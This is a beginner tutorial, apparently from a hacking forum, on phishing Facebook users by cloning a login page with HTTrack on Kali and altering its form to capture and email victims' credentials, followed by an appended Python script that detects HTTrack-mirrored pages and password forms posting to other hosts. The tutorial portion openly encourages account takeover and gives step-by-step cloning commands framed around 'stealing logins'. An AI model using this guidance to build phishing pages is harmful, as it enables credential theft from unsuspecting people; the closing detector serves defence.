Phishing Tutorial For Beginners

Method: Phishing

This option is much more difficult than the rest, but it is also the most common method to hack someone’s account. The most popular type of phishing involves creating a fake login page. The page can be sent via email to your victim and will look exactly like the Facebook login page. If the victim logs in, the information will be sent to you instead of to Facebook. This process is difficult because you will need to create a web hosting account and a fake login page.

The easiest way to do this would be to follow a guide on how to clone a website to make an exact copy of the Facebook login page. Then you’ll just need to tweak the submit form to copy / store / email the login details a victim enters. If you need help with the exact steps, there are detailed instructions available on YouTube. Users are very careful now about logging into Facebook through other links, though, and email phishing filters are getting better every day, so that only adds to this already difficult process. But it’s still possible, especially if you clone the entire Facebook website.

Step 1: Download & Install HTTrack
From Kali, you need to navigate to “System Tools” and then “Add/Remove Software.”
That will open a screen with a search field next to the “Find” button. Enter “httrack” there and it will find the packages you need to install HTTrack.
You can also install it by typing the following in a terminal.

kali > apt-get install httrack

Step 2: Use HTTrack
Now that you’ve installed HTTrack, you should start by looking at the help file for HTTrack. When you downloaded and installed HTTrack, it was placed in the /usr/bin directory, so it should be accessible from any directory in Kali, as /usr/bin is in the PATH variable. Type this:

kali > httrack --help

The basic syntax is the following, where -O stands for “output.” This switch tells HTTrack where to store the copy of the website.

kali > httrack <the URL of the site> [any options] URL Filter -O <location to send copy to>

Using HTTrack is fairly simple. You need only point it at the website you want to copy and then direct the output (-O) to a directory on your hard drive where you want to store the website. One caution here, though: some sites are HUGE. If you tried to copy Facebook to your hard drive, I can guarantee you that you don’t have enough drive space, so start small.

Step 3: Test HTTrack
In my tutorial on hacking MySQL databases behind websites (MySQL is the most widely used database backend behind websites), I used a website that we could hack with impunity called webscantest.com. Let’s try to make a copy of that site to our hard drive.

kali > httrack http://www.webscantest.com -O /tmp/webscantest

As you can see, you should have successfully made a copy of all the pages of this site on your hard drive.

Step 4: Explore the Site Copy
Now that you’ve captured and copied the entire site to your hard drive, take a look at it.

You can open the IceWeasel browser (or any browser) and view the contents of your copied site by pointing it to the location on your hard drive. Since you copied the website to /tmp/webscantest, you simply point your browser there and you can view all the content of the website! If you point it to /tmp/webscantest/www.webscantest.com/login.html, you can see that you’ll have an exact copy of the login page!
Hmmm… What could you possibly use that for???

Step 5: Copy Your Favorite Web Site
Now, try HTTrack on your favorite website, sinister.ly. Try to make a copy of a forum post I wrote earlier about the Free Uber rides. First, let’s open that page right here and copy the address into Kali after the HTTrack command, followed by the location where you want to send the copy.

kali > httrack https://sinister.ly/Thread-Free-Uber-Rides-Introduction-to-Forums -O /tmp/freeuber

You can send the copied website to any location, but I sent mine to /tmp/freeuber. When you do so, HTTrack will go into Sinister, grab that webpage, and store an exact copy of it on your hard drive. Notice it also tells us how many bytes it copied.

You should be able to see that you copied my Sinister post on Free Uber Rides to your Kali drive and can open an exact copy of it with your browser.

If you are trying to find information about a particular company for social engineering or trying to spoof a website or login, HTTrack is an excellent tool for both tasks. I’m sure many of you have pondered the idea of creating a clone of your favorite website and stealing logins… Or maybe you haven’t!

Happy learning!

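A defensive counterpart to the cloned login page described above, as an added example that is not part of the original tutorial: a Python check that flags a fetched page carrying HTTrack's default "Mirrored from" comment for a different host, or a password form that posts to another host. The sample HTML, the `.example` host names and the names `inspect_page` and `FormScan` are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# By default HTTrack writes this comment into every HTML file it mirrors.
MIRROR_RE = re.compile(r"<!--\s*Mirrored from (\S+) by HTTrack Website Copier", re.I)

class FormScan(HTMLParser):
    """Collect the action of every <form> that contains a password field."""
    def __init__(self):
        super().__init__()
        self.in_form, self.action = False, ""
        self.login_actions = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.in_form, self.action = True, a.get("action") or ""
        elif tag == "input" and self.in_form and (a.get("type") or "").lower() == "password":
            self.login_actions.append(self.action)

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False

def inspect_page(html, served_from):
    """Return findings for a page that was fetched from host `served_from`."""
    findings, host = [], served_from.lower()
    m = MIRROR_RE.search(html)
    if m:
        origin = urlparse("//" + m.group(1)).hostname
        if origin and origin != host:
            findings.append(f"httrack-mirror-of:{origin}")
    scan = FormScan()
    scan.feed(html)
    for action in scan.login_actions:
        target = urlparse(action).hostname  # None for relative actions
        if target and target != host:
            findings.append(f"login-form-posts-to:{target}")
    return findings

# Constructed sample: a mirrored login page whose form posts to a third host.
SAMPLE = """<html><!-- Mirrored from www.webscantest.com/login.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 01 Jan 2024 00:00:00 GMT -->
<body><form action="http://other.example/save" method="post">
<input type="text" name="login"><input type="password" name="passwd">
</form></body></html>"""

if __name__ == "__main__":
    print(inspect_page(SAMPLE, "login-portal.example"))
```

A page without the marker is not thereby legitimate; treat the comment as one signal alongside the form target and the serving host.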